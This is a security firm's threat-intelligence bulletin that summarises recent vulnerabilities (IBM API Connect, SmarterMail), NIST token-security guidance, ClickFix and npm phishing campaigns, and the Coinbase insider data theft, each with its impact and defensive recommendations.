Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
Critical authentication bypass in IBM API Connect allows unauthenticated access (CVE-2025-13915)
IBM disclosed a critical authentication bypass vulnerability in IBM API Connect following internal security testing. The issue, tracked as CVE-2025-13915, carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and was initially published on December 17, 2025, with bulletin updates issued through December 25, 2025. IBM API Connect is widely used to design, secure, manage, and monitor enterprise APIs, making authentication flaws in the platform particularly high risk. According to IBM, the vulnerability could allow a remote attacker with no prior authentication to bypass authentication mechanisms and gain unauthorized access to affected API Connect deployments. Impacted versions include v10.0.8.0 through v10.0.8.5 and v10.0.11.0. While IBM has not publicly disclosed detailed exploitation mechanics, the vulnerability is classified under CWE-305 (Authentication Bypass), indicating a failure in enforcing primary authentication checks. IBM has released interim fixes (iFixes) for affected versions and strongly recommends immediate remediation.
Impact: Successful exploitation could enable unauthorized access to API management interfaces and backend components, potentially allowing attackers to view or manipulate API configurations, access sensitive data, disrupt services, or leverage API Connect as a pivot point into downstream systems. Because API Connect often functions as a centralized control plane, compromise may have cascading effects across dependent applications and integrations.
Recommendation: Organizations should review IBM’s security bulletin to confirm whether IBM API Connect is deployed and identify any affected versions. Recommendations include upgrading to the appropriate iFix for v10.0.8.x or v10.0.11.0 as outlined by IBM, validating that no vulnerable instances remain exposed, and restricting access to administrative and developer-facing interfaces. If immediate patching is not feasible, temporarily disable self-service sign-up on the Developer Portal to reduce exposure. Teams should also review authentication and access logs for signs of unauthorized activity, verify the integrity of API configurations, and be prepared to rotate credentials and initiate incident response if exploitation is suspected.
Alert Issued by CSA for SmarterMail Vulnerability
The Cyber Security Agency of Singapore issued an alert regarding a critical vulnerability in SmarterTools SmarterMail software. Tracked as CVE-2025-52691, the flaw carries a CVSS v3.1 score of 10.0 and affects SmarterMail Build 9406 and earlier. SmarterTools has released security updates, and administrators are advised to upgrade immediately. The vulnerability allows an unauthenticated attacker to upload arbitrary files to any location on the mail server. If successfully exploited, this behavior can be leveraged to achieve remote code execution, depending on server configuration and the attacker’s ability to execute the uploaded files. The issue was discovered by a researcher at Singapore’s Centre for Strategic Infocomm Technologies and disclosed through coordinated vulnerability handling.
Impact: If exploited, this vulnerability could be used by unauthenticated attackers to upload files to any location on the mail server, potentially allowing them to place malicious files on the server. The attacker could then perform remote code execution using these malicious files. There is currently no confirmation if this vulnerability has been exploited in the wild.
Recommendation: If using an affected version, please update to Build 9413 (released on October 9th 2025), which contains security fixes. It is important to perform updates that contain security fixes to ensure systems are not vulnerable to attack. Solutions like EDR can also be used to detect unusual activity in cases where vulnerabilities have yet to be discovered. Administrators should review server file systems and logs for indicators of unauthorized file uploads or anomalous execution activity, and treat any evidence of exploitation as a potential full server compromise requiring incident response, credential rotation, and integrity checks.
NIST issues draft guidance to address token and assertion theft driving SSO and cloud access compromise
The National Institute of Standards and Technology released NIST IR 8587 (Initial Public Draft) in December 2025, providing implementation recommendations to protect identity tokens and assertions from forgery, theft, and misuse. The guidance responds to recent high-profile incidents involving stolen or mis-scoped signing keys and weak token validation that enabled attackers to mint or replay valid tokens and bypass MFA in single sign-on (SSO), federation, and API access scenarios. The report expands on SP 800-53 IA-13 enhancements and is intended for federal agencies and cloud service providers, with applicability to commercial environments that rely on token-based access. NIST.IR.8587.ipd The document focuses on securing stateless token architectures by strengthening signing-key protection (generation, isolation, rotation, revocation), enforcing strict token contents and audience restrictions, and shortening token lifetimes with robust refresh and revocation controls. It emphasizes hardware-backed key isolation (e.g., HSMs), tight key scoping (single-tenant where feasible), automated rotation with overlapping validity, mandatory audience checks, session monitoring, and SIEM/UEBA integration to detect token misuse patterns such as replay, redirect, or forged assertions.
Impact: Weak token and assertion controls can grant attackers broad, stealthy access across cloud and hybrid environments, enabling lateral movement and large-scale data exposure without triggering traditional credential defenses. The risks are amplified in multi-tenant clouds and long-lived tokens, where a single key compromise can have outsized blast radius. NIST’s guidance underscores that failures in key isolation, token validation, or audience scoping can be equivalent to “keys to the kingdom” for connected services.
Recommendation: Organizations should review NIST IR 8587 in full to understand how token and assertion misuse has enabled recent real-world cloud and SSO compromises and to assess how the guidance maps to their own identity architecture and risk posture. Critical recommendations include inventorying all token-issuing components and signing keys, enforcing hardware-backed key isolation for moderate- and high-risk systems, and implementing automated key rotation with clearly defined cryptoperiods and tenant scoping. Tokens should be short-lived, explicitly audience-restricted, and validated on every use, with failures generating security alerts. Organizations should also ensure revocation and session termination paths are functional, integrate token telemetry into SIEM and UEBA workflows for detection of replay or anomalous use, and prefer back-channel token presentation where feasible. Regular testing of revocation, logging, and incident response processes is essential to confirm the organization can quickly contain suspected token compromise.
Hudson Rock documents ClickFix–infostealer feedback loop turning legitimate business websites into malware delivery infrastructure
Researchers from Hudson Rock Threat Intelligence report that ClickFix campaigns in 2024–2025 have evolved into a self-reinforcing ecosystem in which compromised organizations become subsequent malware hosts. Using data from the ClickFix Hunter platform correlated with Hudson Rock’s infostealer intelligence, the team identified 1,635 active ClickFix domains, with 220 domains (≈13%) also appearing in infostealer logs as having exposed administrative credentials. These domains are not purpose-built attacker infrastructure but legitimate businesses whose credentials were previously stolen. Technically, ClickFix lures rely on browser-based social engineering rather than exploits, using fake CAPTCHAs, browser errors, or system prompts to trick users into pasting PowerShell commands via the Windows Run dialog. The resulting execution downloads infostealers (e.g., Lumma, Vidar, Stealc), which harvest credentials for CMS platforms and hosting panels. Stolen admin access is then reused to upload new ClickFix scripts onto legitimate sites, creating a feedback loop where infected users supply the infrastructure needed to infect the next wave of victims.
Impact: This model significantly expands the ClickFix attack surface by embedding malware delivery within trusted, legitimate business domains, reducing the effectiveness of traditional domain reputation controls. Organizations whose credentials are stolen may unknowingly host malicious content, exposing customers and partners while also facing reputational, legal, and operational risk. For defenders, the feedback loop means ClickFix activity can scale without centralized infrastructure, making takedowns and blocklists less effective and prolonging campaign longevity.
Recommendation: Recommendation: Organizations should assume that infostealer infections on employee endpoints can directly translate into infrastructure compromise and treat credential hygiene as a perimeter control. Endpoint protections should prioritize detection of clipboard-based execution chains, suspicious PowerShell invocation via the Run dialog, and browser-initiated script execution patterns associated with ClickFix. Credentials for CMS platforms, hosting providers, and “shadow IT” assets should be rotated regularly, protected with phishing-resistant MFA where possible, and restricted to hardened admin devices. Security teams should also proactively audit web properties for unauthorized script changes and monitor for indicators of ClickFix activity on their own domains, while user education efforts reinforce that legitimate CAPTCHAs and updates never require manual command execution.
Former Coinbase customer support agent arrested for facilitating insider-enabled data theft affecting ~69,500 customers
A former customer support agent linked to Coinbase was arrested in Hyderabad for assisting threat actors in stealing sensitive customer data earlier in 2025, according to reporting and public statements from Coinbase leadership. The arrest follows Coinbase’s disclosure in May 2025 that rogue support personnel enabled unauthorized access to internal systems, leading to the exfiltration of customer information and an attempted $20 million extortion demand. Coinbase later confirmed the incident impacted approximately 69,500 customers. Subsequent investigation attributed the access to employees of TaskUs, a third-party customer support provider based in India, who were allegedly bribed to misuse their access. Exposed data included customer names, dates of birth, physical addresses, phone numbers, email addresses, and the last four digits of Social Security numbers, with some cases also involving scanned KYC documents. Coinbase stated that TaskUs terminated the individuals involved and shut down the affected support operation, while law enforcement continues to pursue additional suspects.
Impact: This incident underscores the ongoing risk of insider-enabled compromise within outsourced support environments, where legitimate access can be abused to bypass perimeter controls. Exposure of partial SSNs, KYC documents, and contact information increases the likelihood of downstream fraud, identity theft, targeted phishing, and account takeover attempts against affected customers. More broadly, the case highlights how third-party access and human factors can materially undermine security controls even in highly regulated financial and crypto platforms.
Recommendation: Organizations should reassess third-party and outsourced support access models, enforcing strict least-privilege controls, session monitoring, and real-time alerting on anomalous data access patterns by support staff. Sensitive customer data and KYC artifacts should be segmented and further protected with just-in-time access, enhanced logging, and periodic access revalidation, particularly in offshore or outsourced environments. Regular insider-threat reviews, including behavioral monitoring and fraud risk assessments for privileged support roles, can help detect bribery or coercion indicators earlier.
🚩 Spearphishing campaign abuses npm registry as hosting layer for targeted credential theft against manufacturing and healthcare organizations
Researchers from the Socket Threat Research Team uncovered a sustained spearphishing operation that abused the npm registry as a hosting and distribution mechanism for browser-based phishing content. Active for at least five months, the campaign involved 27 malicious npm packages published under six aliases and targeted 25 identified individuals across U.S. and allied manufacturing, industrial automation, plastics, and healthcare organizations. The targeting and hardcoded victim details indicate deliberate, victim-specific preparation rather than opportunistic mass phishing. Technically, the malicious packages deliver client-side HTML and JavaScript phishing flows that execute directly in the browser, masquerading as secure document-sharing portals before transitioning victims to Microsoft-branded sign-in pages with prefilled email addresses. The scripts overwrite page content, gate interaction behind basic anti-analysis checks (bot detection, honeypot fields, user-interaction requirements), and then redirect victims to threat actor-controlled infrastructure for credential harvesting. Several redirector domains and URL patterns overlap with publicly documented adversary-in-the-middle (AiTM) phishing infrastructure consistent with Evilginx, enabling potential theft of session cookies or tokens in addition to credentials.
Impact: This campaign demonstrates how trusted developer ecosystems can be repurposed as durable phishing infrastructure, increasing the likelihood that lures evade reputation-based defenses and takedowns. For targeted organizations, successful exploitation can result in compromised Microsoft credentials and session tokens, potentially bypassing traditional MFA controls and enabling unauthorized access, email account takeover, and downstream business email compromise or internal reconnaissance.
Recommendation: Organizations should treat package registries and their associated CDNs as potential phishing infrastructure, not just software supply chain risk, and ensure network and endpoint controls can inspect and restrict unexpected browser execution of packaged HTML and JavaScript content. Development teams should tighten dependency intake by validating publishers, pinning versions, and flagging packages that contain full HTML templates, DOM overwrite logic (e.g., document.write()), or heavily obfuscated browser bundles inconsistent with typical libraries. Security teams should monitor for unusual access to package CDNs from non-development contexts and block known malicious packages and domains where feasible. Because the campaign aligns with AiTM techniques, defenders should prioritize phishing-resistant MFA (e.g., WebAuthn/passkeys), enforce conditional access, and closely monitor post-authentication signals such as anomalous session reuse, token abuse, and abnormal OAuth activity.
Sign up here!
To receive the TIGR Threat Watch email bulletin and critical vulnerability notifications, simply complete the form below.
Follow on Twitter
@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.
Subscribe to the RSS
Just copy and add this link to your RSS app and be notified immediately when new intel is posted.
How to use RSS
Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.
To follow using Outlook:
- In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
- In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed
(click here for detailed instructions and additional options for Outlook)
Popular mobile RSS reader apps include:
- Feedly
- NewsBlur
- RSS Reader
- Inoreader
After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed
Threat Bulletin Archive
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.